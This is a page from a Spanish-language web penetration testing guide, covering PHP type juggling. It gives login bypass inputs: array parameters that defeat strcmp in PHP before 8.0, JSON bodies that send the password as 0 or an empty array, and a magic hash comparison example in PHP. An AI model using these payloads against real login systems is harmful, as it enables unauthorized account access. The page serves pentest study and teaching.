🟢
Web Application Penetration Testing
  • Inicio
  • General
    • Metodologías y estándares
    • Aplicaciones vulnerables
  • Reconocimiento y recolección de información
    • Web Application Firewall (WAF)
    • Domain Name System (DNS)
    • Subdominios y Virtual Host (VHost)
    • SSL/TLS y algoritmos de cifrados
    • Certificados
    • Tecnologías web
  • Escaneo y enumeración
    • HTTP security headers
    • HTTP methods (verbs)
    • Crawling y spidering
    • Fuzzing
      • Directorios
      • Archivos
      • Extensiones
      • Parámetros
        • GET
        • POST
      • Wordlists
    • Compresión y ofuscación
    • Herramientas automatizadas
  • Explotación
    • API keys
    • Clickjacking
    • HTTP methods (verbs)
    • Input data validation
    • HTTP Host header
    • Autenticación y autorización
      • Cookie
      • JSON Web Token (JWT)
      • OAuth
      • SAML
    • Same-origin policy (SOP)
      • Cross-origin resource sharing (CORS)
    • Cross-site scripting (XSS)
    • Cross-site request forgery (CSRF)
    • File upload
    • Path traversal & file inclusion
    • Command injection
      • Node.js
    • SQL injection (SQLi)
      • MySQL / MariaDB
      • Microsoft SQL Server
      • PostgreSQL
      • Oracle
      • sqlmap
    • NoSQL injection (NoSQLi)
    • XML external entity (XXE) injection
    • CRLF injection
    • XPath injection
    • LDAP injection
    • PDF injection
    • Server-side template injection (SSTI)
    • Server-side include (SSI) injection
    • Server-side parameter pollution
    • Server-side request forgery (SSRF)
    • Web cache poisoning
    • HTTP request smuggling
    • Prototype pollution
    • Type juggling
    • GraphQL
    • Open redirect
    • Content Management System (CMS)
      • WordPress
    • Websocket
    • Deserialization
    • Flash
  • Revisión de código
    • Java
  • Checklist
    • Web application penetration testing
    • Web API penetration testing
Con tecnología de GitBook
En esta página
  • PHP
  • strcmp
  • JSON
  • Magic hashes

¿Te fue útil?

  1. Explotación

Type juggling

PHP

strcmp

username[]=admin&password[]=admin

El comportamiento de la función strcmp fue modificado a partir de PHP 8.0.0, desde esta versión, se genera un error si alguno de los argumentos proporcionados no es una cadena. Por lo tanto, dicha omisión solo es válida en versiones anteriores a PHP 8.0.0.

JSON

{
    "username":"admin",
    "password":0
}
{
    "username":"admin",
    "password":[]
}

Magic hashes

<?php
    $stored_hash = "0e12345678901234567890123456789012345678901234567890123456789012";
    $input = "TyNOQHUS";
    $input_hash = hash("sha256", $input); // 0e66298694359207596086558843543959518835691168370379069085300385

    if ($stored_hash == $input_hash) {
        echo "Type juggling";
    }
?>
AnteriorPrototype pollutionSiguienteGraphQL

Última actualización hace 13 días

¿Te fue útil?

https://github.com/spaze/hashes